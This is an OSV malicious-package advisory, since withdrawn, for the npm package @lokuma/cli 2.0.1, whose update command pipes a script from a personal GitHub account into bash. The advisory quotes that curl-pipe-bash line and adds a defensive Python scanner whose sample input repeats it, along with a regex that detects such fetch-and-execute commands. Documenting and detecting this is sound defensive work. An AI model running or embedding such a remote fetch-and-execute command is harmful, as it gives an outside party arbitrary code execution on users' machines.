MAL-2026-4405

Import Source: https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@lokuma/cli/MAL-2026-4405.json
JSON Data: https://api.osv.dev/v1/vulns/MAL-2026-4405
Withdrawn: 2026-05-26T21:41:23Z
Published: 2026-05-21T13:49:03Z
Modified: 2026-05-27T00:31:59.585094543Z
Summary: Malicious code in @lokuma/cli (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c1ea692229343873d930161e52d11be25bab87d4a00e942ceb18c1751f0f7586)

The update subcommand of this CLI executes curl -fsSL <url> | bash, where the URL is https://raw.githubusercontent.com/Mumu090909/lokuma-da-v2-trial/main/installer/install-v2-trial.sh: a mutable main branch on a personal GitHub account (Mumu090909) that does not match the package's declared publisher (scope @lokuma, author hello@lokuma.ai, repo github.com/lokuma-web/lokuma-cli, homepage lokuma.ai). The fetch has no commit pin, no hash, and no signature check. The README instructs users to run lokuma update, so any user following the documented upgrade path will execute whatever shell script Mumu090909 chooses to host at that path on any future date. Whoever controls that personal repository can run arbitrary commands as the invoking user on every machine that runs the update command. The publisher mismatch (a personal account fronting an installer for a scoped vendor package) and the README/homepage TLD inconsistency (lokuma.ai vs lokuma.io) further weaken any benign reading.
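As an added, defender-side example (not part of the OSV record or of the package itself), the following Python script scans a package's JavaScript for a remote script piped into a shell and flags the two red flags named above: a raw.githubusercontent.com URL that points at a branch rather than a commit SHA, and a URL owner that differs from the repository owner declared in package.json. The sample index.js and package.json are constructed for the demonstration and reuse only the URL and publisher metadata quoted in this advisory.

```python
import json
import re

# Constructed sample inputs for the demo: a stand-in for dist/index.js and a
# package.json using only the URL and publisher metadata quoted in the advisory.
SAMPLE_INDEX_JS = r'''
const { execSync } = require("child_process");
function update() {
  execSync("curl -fsSL https://raw.githubusercontent.com/Mumu090909/lokuma-da-v2-trial/main/installer/install-v2-trial.sh | bash",
           { stdio: "inherit" });
}
'''
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "@lokuma/cli", "version": "2.0.1", "author": "hello@lokuma.ai",
    "repository": {"type": "git", "url": "git+https://github.com/lokuma-web/lokuma-cli.git"},
})

# curl/wget fetching an http(s) URL whose output is piped into a shell.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;\n]*?(https?://\S+)[^|;\n]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b")
# raw.githubusercontent.com/<owner>/<repo>/<ref>/...; <ref> is mutable unless it is a full SHA.
RAW_GITHUB = re.compile(r"https://raw\.githubusercontent\.com/([^/]+)/([^/]+)/([^/]+)/")
REPO_OWNER = re.compile(r"github\.com[/:]([^/]+)/")

def declared_owner(package_json):
    """GitHub owner from package.json's repository field, or None if not hosted on GitHub."""
    repo = json.loads(package_json).get("repository")
    url = repo.get("url", "") if isinstance(repo, dict) else str(repo or "")
    m = REPO_OWNER.search(url)
    return m.group(1).lower() if m else None

def find_pipe_to_shell(source, package_json):
    """Return one finding per curl|bash-style fetch, each with the reasons it is risky."""
    owner = declared_owner(package_json)
    findings = []
    for m in PIPE_TO_SHELL.finditer(source):
        url = m.group(1).rstrip("\"'`)")
        reasons = ["remote script piped directly into a shell"]
        g = RAW_GITHUB.match(url)
        if g:
            url_owner, _, ref = g.groups()
            if not re.fullmatch(r"[0-9a-f]{40}", ref):
                reasons.append(f"fetched from mutable ref '{ref}' instead of a commit SHA")
            if owner and url_owner.lower() != owner:
                reasons.append(f"URL owner '{url_owner}' differs from declared repo owner '{owner}'")
        findings.append({"url": url, "reasons": reasons})
    return findings
```

Run find_pipe_to_shell over each JavaScript file in an extracted tarball alongside its package.json; a finding with all three reasons is the pattern this advisory describes.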

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "c1ea692229343873d930161e52d11be25bab87d4a00e942ceb18c1751f0f7586",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T13:49:03Z",
            "versions": [
                "2.0.1"
            ],
            "id": "IN-MAL-2026-003839",
            "import_time": "2026-05-26T05:51:25.285902813Z"
        }
    ]
}

Affected packages

npm / @lokuma/cli

Package name: @lokuma/cli
Purl: pkg:npm/%40lokuma%2Fcli

Affected ranges

Affected versions

2.*
2.0.1

Database specific

source: "https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@lokuma/cli/MAL-2026-4405.json"
indicators
{
    "package_integrity": [
        {
            "filename": "cli-2.0.1.tgz",
            "hashes": {
                "sha1": "aaafad3c43c0f75cc6c75dbbddc0849a2edb5749",
                "sha512_sri": "sha512-CBhxTVv/xcg+NZlu8Q124mgLbKWtld+Ppie2CQUFXFPH5uRlDvt/BUAsJI4k+q9Eiy+PpCYHMgmo3dTJMRw4dQ=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/index.js",
            "tlsh": "d592c606cdfa123502e3109d980b553b6669a5333368e964fbac43683fcd764c9a77bc",
            "sha256": "045e0030bd562ce8dcd01ac306e457ca003335fd082e956b1abf5d0667cde8ae"
        },
        {
            "path": "package.json",
            "tlsh": "0321cc35ca308d5306c806a4687a078796aa88534f78fc0873d2831c8f8e32f01fc27e",
            "sha256": "142d6da1ee61f741b3d9309e5a5bb735adfbd1e17b5bb63b1c7fef524902708a"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]